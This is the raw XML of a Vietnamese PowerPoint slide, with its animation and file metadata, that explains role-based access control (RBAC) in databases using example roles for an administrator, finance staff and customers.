          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53DC6911-4B3B-4ABF-4C77-B6922856341F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0758C992-63F2-5CB2-2D16-5542F6DFE385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="7460324"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63552FDF-1C78-8B23-15F0-93201F97EE07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA908A6-B5AB-F8F3-3F2B-FD238581051B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF63C84-6065-4E25-EE81-C6D2DF3257ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="9863328" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ô hình kiểm soát truy cập</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55063CD-77BA-8588-09BD-946DFC7AE468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3577107"/>
            <a:ext cx="9863328" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. Mô hình kiểm soát dựa trên vai trò (RBAC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>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1AF021CE-3302-DDDA-2CAA-4C4DA180DF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1305534" y="4146673"/>
            <a:ext cx="10505466" cy="4478149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trong hệ thống </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cơ sở dữ liệu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người dùng chỉ có thể truy cập vào các đối tượng khi được cấp quyền bởi người quản trị viên:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vai trò "Người quản trị hệ thống" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>có quyền truy cập vào tất cả các bảng dữ liệu, thực hiện các hoạt động như </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>thêm, sửa, xóa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cơ sở dữ liệu và quản lý tài khoản người dùng.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vai trò "Nhân viên Tài chính" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>có quyền truy cập vào bảng dữ liệu liên quan đến tài chính của khách hang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vai trò "Khách hàng" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>chỉ có quyền truy cập vào dữ liệu cá nhân của họ, như lịch sử giao dịch và thông tin tài khoản.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB54FED-40B8-585D-FFEF-D823DFF1E493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162052" y="8640390"/>
            <a:ext cx="10648947" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thể hiện sự </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>phân chia rõ ràng về vai trò và quyền hạn, giúp tăng cường an ninh và tuân thủ quy trình trong tổ chức.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C98644-6A5F-B4F5-368A-941152366491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11963400" y="3577107"/>
            <a:ext cx="5193027" cy="5833593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314563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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="2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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="7" grpId="0"/>
      <p:bldP spid="6"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1098</TotalTime>
  <Words>1833</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>97</Paragraphs>
  <Slides>18</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18</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="25" baseType="lpstr">
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Crimson Pro</vt:lpstr>
      <vt:lpstr>Cabin Medium</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</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Cam Trắng Mô đun Trừu tượng Bản trình bày chiến lược Bản thuyết trình Kinh doanh</dc:title>
  <dc:creator>CHÂU CÔNG THOẠI</dc:creator>
  <cp:lastModifiedBy>Nguyễn Thành Phát</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-19T16:41:35Z</dcterms:modified>
  <dc:identifier>DAF9M7sjAYk</dc:identifier>
</cp:coreProperties>
</file>